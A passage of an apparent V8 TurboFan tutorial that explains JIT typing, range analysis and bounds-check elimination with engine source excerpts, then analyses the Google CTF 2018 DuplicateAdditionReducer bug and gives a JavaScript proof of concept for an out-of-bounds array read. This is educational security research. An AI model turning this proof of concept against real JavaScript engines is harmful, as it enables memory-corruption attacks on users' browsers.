[completed optimizing 0x1fb2b5c9df89 <JSFunction move (sfi = 0x1fb2b5c9dad9)>]
// [...]


The log clearly shows that when encountering the Wall object with a different map (understand "type") it deoptimizes because the code was only meant to deal with Player objects.
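To make the idea of a guarded fast path more concrete, here is a toy model in plain JavaScript. It is only a sketch under loud assumptions: speculate, moveGeneric and the state object are hypothetical names, the x fields are added for illustration, and the instanceof test merely stands in for the map check. This is not how V8 implements deoptimization.

```javascript
// Toy model of speculation + deoptimization (NOT V8's real mechanism).
class Player { constructor() { this.x = 1; } }
class Wall { constructor() { this.x = 2; } }

// Generic (slow) path: works for any object, like the interpreter would.
function moveGeneric(obj) {
  return obj.x + 42;
}

// Build a "speculatively optimized" wrapper guarded by a shape check.
function speculate(generic, expectedClass) {
  const state = { optimized: true, deopts: 0 };
  function call(obj) {
    if (state.optimized) {
      // Guard: plays the role of the map check in optimized code.
      if (obj instanceof expectedClass) {
        return obj.x + 42; // fast path specialised for expectedClass
      }
      // Guard failed ("wrong map"): throw the fast path away.
      state.optimized = false;
      state.deopts += 1;
    }
    return generic(obj);
  }
  return { call, state };
}

const move = speculate(moveGeneric, Player);
const r1 = move.call(new Player()); // takes the fast path
const r2 = move.call(new Wall());   // fails the guard, toy "deopt"
console.log(r1, r2, move.state);
```

After the second call the wrapper has dropped its fast path once, which mirrors the single "wrong map" deoptimization visible in the log above.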

If you are interested in learning more about this, I recommend having a look at the following resources: TurboFan, Introduction to speculative optimization in v8, v8 behind the scenes, Shape and v8 resources.

Sea of Nodes

Just a few words on sea of nodes. TurboFan works on a program representation called a sea of nodes. Nodes can represent arithmetic operations, loads, stores, calls, constants, etc. There are three types of edges that we describe one by one below.

Control edges

Control edges are the same kind of edges that you find in Control Flow Graphs. They enable branches and loops.

Value edges

Value edges are the edges you find in Data Flow Graphs. They show value dependencies.

Effect edges

Effect edges order operations such as reading or writing states.

In a scenario like obj[x] = obj[x] + 1 you need to read the property x before writing it. As such, there is an effect edge between the load and the store. Also, you need to increment the read property before storing it. Therefore, you need an effect edge between the load and the addition. In the end, the effect chain is load -> add -> store as you can see below.
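The effect chain described above can be sketched with a few plain objects. This is a hypothetical miniature structure (makeNode and effectChain are made-up helpers), not TurboFan's C++ Node class; it only models the value and effect edges mentioned in the text.

```javascript
// Hypothetical miniature node: value inputs plus at most one effect input.
function makeNode(id, op, { value = [], effect = null } = {}) {
  return { id, op, value, effect };
}

// obj[x] = obj[x] + 1
const start = makeNode(0, "Start");
const load  = makeNode(1, "Load",  { effect: start });
const one   = makeNode(2, "Constant[1]");
const add   = makeNode(3, "Add",   { value: [load, one], effect: load });
const store = makeNode(4, "Store", { value: [add], effect: add });

// Walk effect edges backwards from a node, then reverse to get program order.
function effectChain(node) {
  const chain = [];
  for (let n = node; n !== null; n = n.effect) chain.push(n.op);
  return chain.reverse();
}

const chain = effectChain(store);
console.log(chain.join(" -> ")); // Start -> Load -> Add -> Store
```

Note that the constant has no effect input at all: it can float freely, which is the whole point of a sea of nodes.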

Experimenting with the optimization phases

In this article we want to focus on how v8 generates optimized code using TurboFan. As mentioned just before, TurboFan works with sea of nodes and we want to understand how this graph evolves through all the optimizations. This is particularly interesting to us because some very powerful security bugs have been found in this area. Recent TurboFan vulnerabilities include incorrect typing of Math.expm1, incorrect typing of String.(last)IndexOf (that I exploited here) or incorrect operation side-effect modeling.

In order to understand what happens, you really need to read the code. Here are a few places you want to look at in the source folder :

• src/builtins

Where all the builtin functions such as Array#concat are implemented

• src/runtime

Where all the runtime functions such as %DebugPrint are implemented

• src/interpreter/interpreter-generator.cc

Where all the bytecode handlers are implemented

• src/compiler

Main repository for TurboFan!

• src/compiler/pipeline.cc

The glue that builds the graph, runs every phase and optimization pass, etc.

• src/compiler/opcodes.h

Macros that define all the opcodes used by TurboFan

• src/compiler/typer.cc

Implements typing via the Typer reducer

• src/compiler/operation-typer.cc

Implements some more typing, used by the Typer reducer

• src/compiler/simplified-lowering.cc

Implements simplified lowering, where some CheckBounds elimination will be done

Let's consider the following function :

function opt_me() {
let x = Math.random();
let y = x + 2;
return y + 3;
}


Simply execute it a lot to trigger TurboFan or manually force optimization with %OptimizeFunctionOnNextCall. Run your code with --trace-turbo to generate trace files for turbolizer.
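As a minimal sketch of the "execute it a lot" option, the loop below simply calls opt_me many times. The iteration count is borrowed from the earlier examples and is an assumption, not a documented threshold. The snippet is plain JavaScript; the %OptimizeFunctionOnNextCall alternative only parses under d8 with --allow-natives-syntax, so it is left as a comment.

```javascript
function opt_me() {
  let x = Math.random();
  let y = x + 2;
  return y + 3;
}

// Call the function many times so that the engine considers it hot.
// With d8 and --allow-natives-syntax you could instead write:
//   opt_me(); %OptimizeFunctionOnNextCall(opt_me); opt_me();
let last = 0;
for (let i = 0; i < 0x10000; ++i) {
  last = opt_me();
}
console.log(last); // a value between 5 and 6
```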

Graph builder phase

We can look at the very first generated graph by selecting the "bytecode graph builder" option. The JSCall node corresponds to the Math.random call and obviously the NumberConstant and SpeculativeNumberAdd nodes are generated because of both x+2 and y+3 statements.

Typer phase

After graph creation come the optimization phases, which as the name implies run various optimization passes. An optimization pass can be called during several phases.

One of the early optimization phases is called the TyperPhase and is run by OptimizeGraph. The code is pretty self-explanatory.

// pipeline.cc
PipelineData* data = this->data_;
// Type the graph and keep the Typer running such that new nodes get
// automatically typed when they are created.
Run<TyperPhase>(data->CreateTyper());

// pipeline.cc
struct TyperPhase {
void Run(PipelineData* data, Zone* temp_zone, Typer* typer) {
// [...]
typer->Run(roots, &induction_vars);
}
};


When the Typer runs, it visits every node of the graph and tries to reduce them.

// typer.cc
void Typer::Run(const NodeVector& roots,
LoopVariableOptimizer* induction_vars) {
// [...]
Visitor visitor(this, induction_vars);
GraphReducer graph_reducer(zone(), graph());
for (Node* const root : roots) graph_reducer.ReduceNode(root);
graph_reducer.ReduceGraph();
// [...]
}

class Typer::Visitor : public Reducer {
// ...
Reduction Reduce(Node* node) override {
// calls visitors such as JSCallTyper
}

// typer.cc
Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
if (!fun.IsHeapConstant() || !fun.AsHeapConstant()->Ref().IsJSFunction()) {
return Type::NonInternal();
}
JSFunctionRef function = fun.AsHeapConstant()->Ref().AsJSFunction();
if (!function.shared().HasBuiltinFunctionId()) {
return Type::NonInternal();
}
switch (function.shared().builtin_function_id()) {
case BuiltinFunctionId::kMathRandom:
return Type::PlainNumber();


So basically, the TyperPhase is going to call JSCallTyper on every single JSCall node that it visits. If we read the code of JSCallTyper, we see that whenever the called function is a builtin, it will associate a Type with it. For instance, in the case of a call to the MathRandom builtin, it knows that the expected return type is a Type::PlainNumber.

Type Typer::Visitor::TypeNumberConstant(Node* node) {
double number = OpParameter<double>(node->op());
return Type::NewConstant(number, zone());
}
Type Type::NewConstant(double value, Zone* zone) {
if (RangeType::IsInteger(value)) {
return Range(value, value, zone);
} else if (IsMinusZero(value)) {
return Type::MinusZero();
} else if (std::isnan(value)) {
return Type::NaN();
}

DCHECK(OtherNumberConstantType::IsOtherNumberConstant(value));
return OtherNumberConstant(value, zone);
}


For the NumberConstant nodes it's easy. We simply read TypeNumberConstant. In most cases, the type will be Range. What about those SpeculativeNumberAdd now? We need to look at the OperationTyper.

#define SPECULATIVE_NUMBER_BINOP(Name)                         \
  Type OperationTyper::Speculative##Name(Type lhs, Type rhs) { \
    lhs = SpeculativeToNumber(lhs);                            \
    rhs = SpeculativeToNumber(rhs);                            \
    return Name(lhs, rhs);                                     \
  }
// [...]
#undef SPECULATIVE_NUMBER_BINOP

Type OperationTyper::SpeculativeToNumber(Type type) {
  // [...]
}


They end up being reduced by OperationTyper::NumberAdd(Type lhs, Type rhs) (the return Name(lhs,rhs) becomes return NumberAdd(lhs, rhs) after pre-processing).

To get the types of the right input node and the left input node, we call SpeculativeToNumber on both of them. To keep it simple, any kind of Type::Number will remain the same type (a PlainNumber being a Number, it will stay a PlainNumber). The Range(n,n) type will become a Number as well so that we end up calling NumberAdd on two Numbers. NumberAdd mostly checks for some corner cases, for instance whether one of the two types is a MinusZero. In most cases, the function will simply return the PlainNumber type.

Okay done for the Typer phase!

To sum up, everything happened in:

• Typer::Visitor::JSCallTyper
• OperationTyper::SpeculativeNumberAdd

And this is how types are treated:

• The type of JSCall(MathRandom) becomes a PlainNumber,
• The type of NumberConstant[n] with n != NaN & n != -0 becomes a Range(n,n)
• The type of a Range(n,n) is PlainNumber
• The type of SpeculativeNumberAdd(PlainNumber, PlainNumber) is PlainNumber
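The constant typing rule is easy to play with outside of V8. The sketch below mimics the decision tree of Type::NewConstant using plain objects. newConstantType is a hypothetical name, and treating infinities as integers is my assumption about the C++ helper, so take it as an illustration rather than a faithful port.

```javascript
// Toy version of the branching in Type::NewConstant.
// Types are plain objects here, not V8's Type class.
function newConstantType(value) {
  // Assumption: integers include +/-Infinity but exclude -0.
  if (Math.trunc(value) === value && !Object.is(value, -0)) {
    return { kind: "Range", min: value, max: value };
  } else if (Object.is(value, -0)) {
    return { kind: "MinusZero" };
  } else if (Number.isNaN(value)) {
    return { kind: "NaN" };
  }
  return { kind: "OtherNumberConstant", value };
}

const typed = [2, 3, -0, NaN, 0.5].map(newConstantType);
console.log(typed.map((t) => t.kind));
```

The constants 2 and 3 from opt_me both land in the Range branch, which matches the Range(n,n) entry of the summary above.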

Now the graph looks like this :

Type lowering

In OptimizeGraph, the type lowering comes right after the typing.

// pipeline.cc
Run<TyperPhase>(data->CreateTyper());
RunPrintAndVerify(TyperPhase::phase_name());
Run<TypedLoweringPhase>();
RunPrintAndVerify(TypedLoweringPhase::phase_name());


This phase goes through even more reducers.

// pipeline.cc
TypedOptimization typed_optimization(&graph_reducer, data->dependencies(),
data->jsgraph(), data->broker());
// [...]


Let's have a look at the TypedOptimization and more specifically TypedOptimization::Reduce.

When a node is visited and its opcode is IrOpcode::kSpeculativeNumberAdd, it calls ReduceSpeculativeNumberAdd.

Reduction TypedOptimization::ReduceSpeculativeNumberAdd(Node* node) {
  Node* const lhs = NodeProperties::GetValueInput(node, 0);
  Node* const rhs = NodeProperties::GetValueInput(node, 1);
  Type const lhs_type = NodeProperties::GetType(lhs);
  Type const rhs_type = NodeProperties::GetType(rhs);
  NumberOperationHint hint = NumberOperationHintOf(node->op());
  if ((hint == NumberOperationHint::kNumber ||
       hint == NumberOperationHint::kNumberOrOddball) &&
      BothAre(lhs_type, rhs_type, Type::PlainPrimitive()) &&
      /* [...] */) {
    Node* const toNum_lhs = ConvertPlainPrimitiveToNumber(lhs);
    Node* const toNum_rhs = ConvertPlainPrimitiveToNumber(rhs);
    Node* const value = /* [...] */;
    ReplaceWithValue(node, value);
    return Replace(node);
  }
  return NoChange();
}


In the case of our two nodes, both have a hint of NumberOperationHint::kNumber because their type is a PlainNumber.

Both the right and left hand side types are PlainPrimitive (PlainNumber from the NumberConstant's Range and PlainNumber from the JSCall). Therefore, a new NumberAdd node is created and replaces the SpeculativeNumberAdd.

Similarly, there is a JSTypedLowering::ReduceJSCall called when the JSTypedLowering reducer is visiting a JSCall node. Because the call target is a Code Stub Assembler implementation of a builtin function, TurboFan simply creates a LoadField node and changes the opcode of the JSCall node to a Call opcode.

It also adds new inputs to this node.

Reduction JSTypedLowering::ReduceJSCall(Node* node) {
// [...]
// Check if {target} is a known JSFunction.
// [...]
// Load the context from the {target}.
Node* context = effect = graph()->NewNode(
effect, control);
NodeProperties::ReplaceContextInput(node, context);

// Update the effect dependency for the {node}.
NodeProperties::ReplaceEffectInput(node, effect);
// [...]
// kMathRandom is a CSA builtin, not a CPP one
// builtins-math-gen.cc:TF_BUILTIN(MathRandom, CodeStubAssembler)
} else if (shared.HasBuiltinId() &&
Builtins::HasCppImplementation(shared.builtin_id())) {
// Patch {node} to a direct CEntry call.
ReduceBuiltin(jsgraph(), node, shared.builtin_id(), arity, flags);
} else if (shared.HasBuiltinId() &&
Builtins::KindOf(shared.builtin_id()) == Builtins::TFJ) {
// Patch {node} to a direct code object call.
Callable callable = Builtins::CallableFor(
isolate(), static_cast<Builtins::Name>(shared.builtin_id()));
CallDescriptor::Flags flags = CallDescriptor::kNeedsFrameState;

const CallInterfaceDescriptor& descriptor = callable.descriptor();
graph()->zone(), descriptor, 1 + arity, flags);
Node* stub_code = jsgraph()->HeapConstant(callable.code());
node->InsertInput(graph()->zone(), 0, stub_code);  // Code object.
node->InsertInput(graph()->zone(), 2, new_target);
node->InsertInput(graph()->zone(), 3, argument_count);
NodeProperties::ChangeOp(node, common()->Call(call_descriptor));
}
// [...]
return Changed(node);
}


Let's quickly check the sea of nodes to indeed observe the addition of the LoadField and the change of opcode of the node #25 (note that it is the same node as before, only the opcode changed).

Range types

Previously, we encountered various types including the Range type. However, it was always the case of Range(n,n) of size 1.

Now let's consider the following code :

function opt_me(b) {
let x = 10; // [1] x0 = 10
if (b == "foo")
x = 5; // [2] x1 = 5
// [3] x2 = phi(x0, x1)
let y = x + 2;
y = y + 1000;
y = y * 2;
return y;
}


So depending on b == "foo" being true or false, x will be either 10 or 5. In SSA form, each variable can be assigned only once. So x0 and x1 will be created for 10 and 5 at lines [1] and [2]. At line [3], the value of x (x2 in SSA) will be either x0 or x1, hence the need of a phi function. The statement x2 = phi(x0,x1) means that x2 can take the value of either x0 or x1.

So what about types now? The type of the constant 10 (x0) is Range(10,10) and the type of the constant 5 (x1) is Range(5,5). Unsurprisingly, the type of the phi node is the union of the two ranges, which is Range(5,10).

Let's quickly draw a CFG graph in SSA form with typing.

Okay, let's actually check this by reading the code.

Type Typer::Visitor::TypePhi(Node* node) {
int arity = node->op()->ValueInputCount();
Type type = Operand(node, 0);
for (int i = 1; i < arity; ++i) {
type = Type::Union(type, Operand(node, i), zone());
}
return type;
}


The code looks exactly as we would expect it to be: simply the union of all of the input types!
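A tiny JavaScript model reproduces the Range(5,10) result. Ranges are modelled as {min, max} objects and unionRange is a hypothetical helper that only covers the Range with Range case of Type::Union, so this is a sketch of the idea and nothing more.

```javascript
// Only the Range/Range case of a type union: take the enclosing interval.
function unionRange(a, b) {
  return { min: Math.min(a.min, b.min), max: Math.max(a.max, b.max) };
}

// Mirrors the loop in TypePhi: fold the union over every value input.
function typePhi(inputs) {
  let type = inputs[0];
  for (let i = 1; i < inputs.length; ++i) {
    type = unionRange(type, inputs[i]);
  }
  return type;
}

const x0 = { min: 10, max: 10 }; // NumberConstant[10]
const x1 = { min: 5, max: 5 };   // NumberConstant[5]
const x2 = typePhi([x0, x1]);    // phi(x0, x1)
console.log(x2); // { min: 5, max: 10 }
```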

To understand the typing of the SpeculativeSafeIntegerAdd nodes, we need to go back to the OperationTyper implementation. In the case of SpeculativeSafeIntegerAdd(n,m), TurboFan does an AddRanger(n.Min(), n.Max(), m.Min(), m.Max()).

Type OperationTyper::SpeculativeSafeIntegerAdd(Type lhs, Type rhs) {
  // [...]
  // If we have a Smi or Int32 feedback, the representation selection will
  // either truncate or it will check the inputs (i.e., deopt if not int32).
  // In either case the result will be in the safe integer range, so we
  // can bake in the type here. This needs to be in sync with
  // [...]
  return Type::Intersect(result, cache_->kSafeIntegerOrMinusZero, zone());
}

Type OperationTyper::NumberAdd(Type lhs, Type rhs) {
// [...]
Type type = Type::None();
lhs = Type::Intersect(lhs, Type::PlainNumber(), zone());
rhs = Type::Intersect(rhs, Type::PlainNumber(), zone());
if (!lhs.IsNone() && !rhs.IsNone()) {
if (lhs.Is(cache_->kInteger) && rhs.Is(cache_->kInteger)) {
type = AddRanger(lhs.Min(), lhs.Max(), rhs.Min(), rhs.Max());
}
// [...]
return type;
}


AddRanger is the function that actually computes the min and max bounds of the Range.

Type OperationTyper::AddRanger(double lhs_min, double lhs_max, double rhs_min,
double rhs_max) {
double results[4];
results[0] = lhs_min + rhs_min;
results[1] = lhs_min + rhs_max;
results[2] = lhs_max + rhs_min;
results[3] = lhs_max + rhs_max;
// Since none of the inputs can be -0, the result cannot be -0 either.
// However, it can be nan (the sum of two infinities of opposite sign).
// On the other hand, if none of the "results" above is nan, then the
// actual result cannot be nan either.
int nans = 0;
for (int i = 0; i < 4; ++i) {
if (std::isnan(results[i])) ++nans;
}
if (nans == 4) return Type::NaN();
Type type = Type::Range(array_min(results, 4), array_max(results, 4), zone());
if (nans > 0) type = Type::Union(type, Type::NaN(), zone());
// Examples:
//   [-inf, -inf] + [+inf, +inf] = NaN
//   [-inf, -inf] + [n, +inf] = [-inf, -inf] \/ NaN
//   [-inf, +inf] + [n, +inf] = [-inf, +inf] \/ NaN
//   [-inf, m] + [n, +inf] = [-inf, +inf] \/ NaN
return type;
}


Done with the range analysis!

CheckBounds nodes

Our final experiment deals with CheckBounds nodes. Basically, nodes with a CheckBounds opcode add bound checks before loads and stores.

Consider the following code :

function opt_me(b) {
let values = [42,1337];       // HeapConstant <FixedArray[2]>
let x = 10;                   // NumberConstant[10]          | Range(10,10)
if (b == "foo")
x = 5;                      // NumberConstant[5]           | Range(5,5)
// Phi                         | Range(5,10)
let y = x + 2;                // SpeculativeSafeIntegerAdd   | Range(7,12)
y = y + 1000;                 // SpeculativeSafeIntegerAdd   | Range(1007,1012)
y = y * 2;                    // SpeculativeNumberMultiply   | Range(2014,2024)
y = y & 10;                   // SpeculativeNumberBitwiseAnd | Range(0,10)
y = y / 3;                    // SpeculativeNumberDivide     | PlainNumber[r][s][t]
y = y & 1;                    // SpeculativeNumberBitwiseAnd | Range(0,1)
return values[y];             // CheckBounds                 | Range(0,1)
}


In order to prevent values[y] from using an out of bounds index, a CheckBounds node is generated. Here is what the sea of nodes graph looks like right after the escape analysis phase.

The cautious reader probably noticed something interesting about the range analysis. The type of the CheckBounds node is Range(0,1)! And also, the LoadElement has an input FixedArray HeapConstant of length 2. That leads us to an interesting phase: the simplified lowering.

Simplified lowering

When visiting a node with an IrOpcode::kCheckBounds opcode, the function VisitCheckBounds is going to get called.

And this function is responsible for CheckBounds elimination, which sounds interesting!

Long story short, it compares inputs 0 (index) and 1 (length). If the index's minimum range value is greater than or equal to zero and its maximum range value is less than the length's minimum value, it triggers a DeferReplacement, which means that the CheckBounds node will eventually be removed!

 void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
CheckParameters const& p = CheckParametersOf(node->op());
Type const index_type = TypeOf(node->InputAt(0));
Type const length_type = TypeOf(node->InputAt(1));
if (length_type.Is(Type::Unsigned31())) {
if (index_type.Is(Type::Integral32OrMinusZero())) {
// Map -0 to 0, and the values in the [-2^31,-1] range to the
// [2^31,2^32-1] range, which will be considered out-of-bounds
// as well, because the {length_type} is limited to Unsigned31.
VisitBinop(node, UseInfo::TruncatingWord32(),
MachineRepresentation::kWord32);
if (lower()) {
if (lowering->poisoning_level_ ==
PoisoningMitigationLevel::kDontPoison &&
(index_type.IsNone() || length_type.IsNone() ||
(index_type.Min() >= 0.0 &&
index_type.Max() < length_type.Min()))) {
// The bounds check is redundant if we already know that
// the index is within the bounds of [0.0, length[.
DeferReplacement(node, node->InputAt(0));
} else {
NodeProperties::ChangeOp(
node, simplified()->CheckedUint32Bounds(p.feedback()));
}
}
// [...]
}


Once again, let's confirm that by playing with the graph. We want to look at the CheckBounds before the simplified lowering and observe its inputs.

We can easily see that Range(0,1).Max() < 2 and Range(0,1).Min() >= 0. Therefore, node 58 is going to be replaced, since the analysis done by the optimization passes proved it useless.
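The range comparison at the heart of this elimination fits in one line of JavaScript. The predicate below is a simplified sketch: isBoundsCheckRedundant is a hypothetical name, types are {min, max} objects, and the IsNone and poisoning-level conditions of the real function are deliberately left out.

```javascript
// Simplified form of the range test done in VisitCheckBounds.
function isBoundsCheckRedundant(indexType, lengthType) {
  return indexType.min >= 0 && indexType.max < lengthType.min;
}

const lengthType = { min: 2, max: 2 };   // FixedArray of length 2
const safeIndex = { min: 0, max: 1 };    // Range(0,1), as in opt_me
const tooLarge = { min: 0, max: 2 };     // could reach index 2
const negative = { min: -1, max: 1 };    // could be negative

console.log(isBoundsCheckRedundant(safeIndex, lengthType)); // true
console.log(isBoundsCheckRedundant(tooLarge, lengthType));  // false
console.log(isBoundsCheckRedundant(negative, lengthType));  // false
```

This also shows why a typer bug is so valuable: if the computed range is narrower than the values that can really occur, the predicate returns true for an index that is not actually safe.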

After simplified lowering, the graph looks like this :

If you look at the file opcodes.h, we can see various types of opcodes that correspond to some kind of add primitive.

V(JSAdd)
// many more [...]


So, without going into too much detail, we're going to do one more experiment. Let's write small snippets of code that generate each one of these opcodes. For each one, we want to confirm we get the expected opcode in the sea of nodes.

let opt_me = (x) => {
return x + 1;
}

for (var i = 0; i < 0x10000; ++i)
opt_me(i);
%DebugPrint(opt_me);
%SystemBreak();


In this case, TurboFan speculates that x will be an integer. This guess is made due to the type feedback we mentioned earlier.

Indeed, before kicking off TurboFan, v8 first quickly generates ignition bytecode that gathers type feedback.

$ d8 speculative_safeintegeradd.js --allow-natives-syntax --print-bytecode --print-bytecode-filter opt_me
[generated bytecode for function: opt_me]
Parameter count 2
Frame size 0
   13 E> 0xceb2389dc72 @    0 : a5                StackCheck
   24 S> 0xceb2389dc73 @    1 : 25 02             Ldar a0
   33 E> 0xceb2389dc75 @    3 : 40 01 00          AddSmi [1], [0]
   37 S> 0xceb2389dc78 @    6 : a9                Return
Constant pool (size = 0)
Handler Table (size = 0)

The x + 1 statement is represented by the AddSmi ignition opcode.

If you want to know more, Franziska Hinkelmann wrote a blog post about ignition bytecode.

Let's read the code to quickly understand the semantics.

// Adds an immediate value <imm> to the value in the accumulator.
IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) {
  BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback);
}

This code means that every time this ignition opcode is executed, it will gather type feedback to enable TurboFan's speculative optimizations.

We can examine the type feedback vector (which is the structure containing the profiling data) of a function by using %DebugPrint or the job gdb command on a tagged pointer to a FeedbackVector.

DebugPrint: 0x129ab460af59: [Function]
// [...]
- feedback vector: 0x1a5d13f1dd91: [FeedbackVector] in OldSpace
// [...]

gef➤  job 0x1a5d13f1dd91
0x1a5d13f1dd91: [FeedbackVector] in OldSpace
// ...
- slot #0 BinaryOp BinaryOp:SignedSmall { // actual type feedback
[0]: 1
}

Thanks to this profiling, TurboFan knows it can generate a SpeculativeSafeIntegerAdd. This is exactly the reason why it is called speculative optimization (TurboFan makes guesses, assumptions, based on this profiling). However, once optimized, if opt_me is called with a completely different parameter type, there would be a deoptimization.

SpeculativeNumberAdd

let opt_me = (x) => {
  return x + 1000000000000;
}
opt_me(42);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(4242);

If we slightly modify the previous code snippet and use a higher value that can't be represented by a small integer (Smi), we'll get a SpeculativeNumberAdd instead. TurboFan speculates about the type of x and relies on type feedback.

Int32Add

let opt_me = (x) => {
  let y = x ? 10 : 20;
  return y + 100;
}
opt_me(true);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(false);

At first, the addition y + 100 relies on speculation. Thus, the opcode SpeculativeSafeIntegerAdd is being used. However, during the simplified lowering phase, TurboFan understands that y + 100 is always going to be an addition between two small 32-bit integers, thus lowering the node to an Int32Add.

• Before
• After

JSAdd

let opt_me = (x) => {
  let y = x ?
    ({valueOf() { return 10; }})
    :
    ({[Symbol.toPrimitive]() { return 20; }});
  return y + 1;
}

opt_me(true);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(false);

In this case, y is a complex object and we need to call a slow JSAdd opcode to deal with this kind of situation.

NumberAdd

let opt_me = (x) => {
  let y = x ? 10 : 20;
  return y + 1000000000000;
}

opt_me(true);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(false);

As in the SpeculativeNumberAdd example, we add a value that can't be represented by a small integer. However, this time there is no speculation involved. There is no need for any kind of type feedback since we can guarantee that y is an integer. There is no way to make y anything other than an integer.

The DuplicateAdditionReducer challenge

The DuplicateAdditionReducer written by Stephen Röttger for Google CTF 2018 is a nice TurboFan challenge that adds a new reducer optimizing cases like x + 1 + 1.

Understanding the reduction

Let's read the relevant part of the code.

Reduction DuplicateAdditionReducer::Reduce(Node* node) {
  switch (node->opcode()) {
    case IrOpcode::kNumberAdd:
      return ReduceAddition(node);
    default:
      return NoChange();
  }
}

Reduction DuplicateAdditionReducer::ReduceAddition(Node* node) {
  DCHECK_EQ(node->op()->ControlInputCount(), 0);
  DCHECK_EQ(node->op()->EffectInputCount(), 0);
  DCHECK_EQ(node->op()->ValueInputCount(), 2);

  Node* left = NodeProperties::GetValueInput(node, 0);
  if (left->opcode() != node->opcode()) {
    return NoChange(); // [1]
  }

  Node* right = NodeProperties::GetValueInput(node, 1);
  if (right->opcode() != IrOpcode::kNumberConstant) {
    return NoChange(); // [2]
  }

  Node* parent_left = NodeProperties::GetValueInput(left, 0);
  Node* parent_right = NodeProperties::GetValueInput(left, 1);
  if (parent_right->opcode() != IrOpcode::kNumberConstant) {
    return NoChange(); // [3]
  }

  double const1 = OpParameter<double>(right->op());
  double const2 = OpParameter<double>(parent_right->op());
  Node* new_const = graph()->NewNode(common()->NumberConstant(const1+const2));

  NodeProperties::ReplaceValueInput(node, parent_left, 0);
  NodeProperties::ReplaceValueInput(node, new_const, 1);

  return Changed(node); // [4]
}


Basically, that means we've got 4 different code paths (read the code comments) when reducing a NumberAdd node. Only one of them leads to a node change. Let's draw a schema representing all of those cases. Nodes in red indicate that they don't satisfy a condition, leading to a return NoChange.

Case [4] takes the double values of both NumberConstant nodes and adds them together. It creates a new NumberConstant node whose value is the result of this addition.

The node's right input becomes the newly created NumberConstant, while the left input is replaced by the left parent's left input.

Understanding the bug

Precision loss with IEEE-754 doubles

V8 represents numbers using IEEE-754 doubles. Integers are only encoded exactly as long as they fit in the 53-bit significand (52 stored bits plus an implicit leading 1). Therefore the maximum safe integer is pow(2,53)-1, which is 9007199254740991.
Not every integer above this value can be represented. As such, there will be precision loss when computing with values greater than that.

A quick experiment in JavaScript demonstrates this problem, which leads to strange behaviors.

d8> var x = Number.MAX_SAFE_INTEGER + 1
undefined
d8> x
9007199254740992
d8> x + 1
9007199254740992
d8> 9007199254740993 == 9007199254740992
true
d8> x + 2
9007199254740994
d8> x + 3
9007199254740996
d8> x + 4
9007199254740996
d8> x + 5
9007199254740996
d8> x + 6
9007199254740998


Let's try to better understand this. 64-bit IEEE-754 doubles are represented using a 1-bit sign, an 11-bit exponent and a 52-bit mantissa. When using the normalized form (exponent is non-zero), the value is computed with the following formula.

value = (-1)^sign * 2^e * fraction
e = exponent - bias
bias = 1023 (for 64-bit doubles)
fraction = 1 + bit51*2^-1 + bit50*2^-2 + ... + bit0*2^-52


So let's go through a few computations ourselves.

d8> %DumpObjects(Number.MAX_SAFE_INTEGER, 10)
----- [ HEAP_NUMBER_TYPE : 0x10 ] -----
0x00000b8fffc0ddd0    0x00001f5c50100559    MAP_TYPE
0x00000b8fffc0ddd8    0x433fffffffffffff

d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 1, 10)
----- [ HEAP_NUMBER_TYPE : 0x10 ] -----
0x00000b8fffc0aec0    0x00001f5c50100559    MAP_TYPE
0x00000b8fffc0aec8    0x4340000000000000

d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 2, 10)
----- [ HEAP_NUMBER_TYPE : 0x10 ] -----
0x00000b8fffc0de88    0x00001f5c50100559    MAP_TYPE
0x00000b8fffc0de90    0x4340000000000001


For each number, we'll have the following computation.

You can try the computations using links 1, 2 and 3.

As you see, the precision loss is inherent to the way IEEE-754 computations are made. Even though we incremented the binary value, the corresponding real number was not incremented accordingly. It is impossible to represent the value 9007199254740993 using IEEE-754 doubles. That's why it is not possible to increment 9007199254740992.
You can however add 2 to 9007199254740992 because the result can be represented!

That means that x += 1; x += 1; may not be equivalent to x += 2. And that might be an interesting behaviour to exploit.

d8> var x = Number.MAX_SAFE_INTEGER + 1
9007199254740992
d8> x + 1 + 1
9007199254740992
d8> x + 2
9007199254740994


Therefore, those two graphs are not equivalent.

Furthermore, the reducer does not update the type of the changed node. That's why it is going to be 'incorrectly' typed with the old Range(9007199254740992,9007199254740992), from the previous Typer phase, instead of Range(9007199254740994,9007199254740994) (even though the real problem is that we cannot take for granted that there is no precision loss while computing m + n, and therefore x += m; x += n; may not be equivalent to x += (m + n)).

There is going to be a mismatch between the addition result 9007199254740994 and the range type with a maximum value of 9007199254740992. What if we could use this buggy range analysis to get a CheckBounds node removed during the simplified lowering phase?

It is actually possible to trick the CheckBounds simplified lowering visitor into comparing an incorrect index Range to the length, so that it believes the index is in bounds when in reality it is not, and removes what looks like a useless bounds check.

Let's check this by having yet another look at the sea of nodes!

First consider the following code.

let opt_me = (x) => {
  let arr = new Array(1.1,1.2,1.3,1.4);
  arr2 = new Array(42.1,42.0,42.0);
  let y = (x == "foo") ? 4503599627370495 : 4503599627370493;
  let z = 2 + y + y ; // maximum value : 2 + 4503599627370495 * 2 = 9007199254740992
  z = z + 1 + 1; // 9007199254740992 + 1 + 1 = 9007199254740992 + 1 = 9007199254740992
  // replaced by 9007199254740992+2=9007199254740994 because of the incorrect reduction
  z = z - (4503599627370495*2); // max = 2 vs actual max = 4
  return arr[z];
}

opt_me("");
%OptimizeFunctionOnNextCall(opt_me);
let res = opt_me("foo");
print(res);


We do get a graph that looks exactly like the problematic drawing we showed before. Instead of getting two NumberAdd(x,1), we get only one NumberAdd(x,2), which is not equivalent.

The maximum value of z will be the following:

d8> var x = 9007199254740992
d8> x = x + 2 // because of the buggy reducer!
9007199254740994
d8> x = x - (4503599627370495*2)
4


However, the index range used when visiting CheckBounds during simplified lowering will be computed as follows:

d8> var x = 9007199254740992
d8> x = x + 1
9007199254740992
d8> x = x + 1
9007199254740992
d8> x = x - (4503599627370495*2)
2


Confirm that by looking at the graph.

